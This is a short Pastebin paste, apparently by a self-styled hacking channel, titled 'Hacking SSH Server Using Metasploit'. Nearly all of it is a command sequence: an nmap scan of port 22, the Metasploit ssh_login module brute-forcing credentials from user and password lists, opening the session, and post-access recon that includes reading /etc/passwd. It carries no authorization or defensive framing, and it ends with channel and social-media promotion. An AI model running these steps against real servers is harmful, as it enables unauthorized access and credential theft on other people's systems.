Professional-hacker

Hacking SSH Server Using Metasploit

Dec 19th, 2016
707
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.01 KB | None | 0 0
  1. ##################################################JokerSecurity###############################################################
  2. # Title : Hacking SSH Server Using Metasploit
  3. # Tested On : [ Kali-Linux ]
  4. # MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
  5. # Myblog : http://kader-information.blogspot.com/
  6. # Link video : https://www.youtube.com/watch?v=NTns-8UdIes&feature=youtu.be
  7. ######################
  8. # [+] COMMENDS :
  9. ######################
  10. msfconsole
  11. db_status
  12. db_nmap -sS ip -p 22
  13. search ssh
  14. use auxiliary/scanner/ssh/ssh_login
  15. show options
  16. set RHOSTS ...
  17. set PASS_FILE ....
  18. set USER_FILE
  19. run
  20. sessions -i 1
  21.  
  22.  
  23. ifconfig
  24. uname -a
  25. cat /etc/passwd
  26.  
  27.  
  28.  
  29. subscribe for my channel and page in facebook
  30.  
  31. # My Blogger : http://kader-information.blogspot.com/
  32.  
  33. # Page FacebOOk : https://www.facebook.com/AnonymousPalestine.vip
  34.  
  35. By <3
  36.  
  37. ##################################################JokerSecurity###############################################################
Add Comment
Please, Sign In to add comment